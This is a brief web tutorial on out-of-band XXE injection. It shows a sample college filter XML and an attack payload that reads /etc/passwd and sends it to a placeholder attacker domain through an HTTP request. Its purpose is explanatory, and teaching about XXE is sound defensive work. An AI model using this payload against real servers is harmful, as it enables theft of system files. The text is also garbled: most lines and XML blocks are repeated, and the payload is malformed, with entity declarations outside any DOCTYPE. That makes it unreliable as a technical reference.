What is Out of Band XXE?
What is Out of Band XXE?
When an attacker can't receive the results in the same band or channel, he tries to retrieve the desired information via some other channel. If an attacker can get the information via some other band or channel, this is called Out of Band XXE.
How does an Out of Band XXE work?
As explained, Out of band XXE allows an attacker to retrieve desired information via some other channel, an attacker injects XML external entity with URL of some external URL.
To detect and Out of Band XXE, an attacker provides an attacker-controlled URL in the external entity of the XML file and observe the DNS and HTTP requests received on the URL to confirm the vulnerability.
Examples:
Let's understand XXE with a basic example. Please assume that an application of a college is having a filter option and the following XML file is used as an input to an insecure parser:
Let's understand XXE with a basic example. Please assume that an application of a college is having a filter option and the following XML file is used as an input to an insecure parser:
<?xml version="1.0" encoding="UTF-8"?>
<filter>
<semester>3</semester>
<branch>CE</branch>
</filter>
<?xml version="1.0" encoding="UTF-8"?>
<filter>
<semester>3</semester>
<branch>CE</branch>
</filter>
<filter>
<semester>3</semester>
<branch>CE</branch>
</filter>
If server is parsing this file insecurly on server-side, an attacker can provide following payload to exploit the Out of Band XXE:
If server is parsing this file insecurly on server-side, an attacker can provide following payload to exploit the Out of Band XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % secretFile SYSTEM "file:///etc/passwd">
<!ENTITY % semester "<!ENTITY % branch SYSTEM 'http://www.attackercontrolleddomain.com/?exploit=%secretFile;'>">
<filter>
<semester>&semester;</semester>
<branch>&branch;</branch>
</filter>
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % secretFile SYSTEM "file:///etc/passwd">
<!ENTITY % semester "<!ENTITY % branch SYSTEM 'http://www.attackercontrolleddomain.com/?exploit=%secretFile;'>">
<!ENTITY % semester "<!ENTITY % branch SYSTEM 'http://www.attackercontrolleddomain.com/?exploit=%secretFile;'>">
<filter>
<semester>&semester;</semester>
<branch>&branch;</branch>
</filter>
The above XML file will resolve the semester entity which will lead to load the passwd file in another entity branch. When branch entity will be resolved by the XML parser, it will make an HTTP request to attacker's server with passwd file content in the exploit parameter.
The above XML file will resolve the semester entity which will lead to load the passwd file in another entity branch. When branch entity will be resolved by the XML parser, it will make an HTTP request to attacker's server with passwd file content in the exploit parameter.
Reference:
Reference:
0 Comments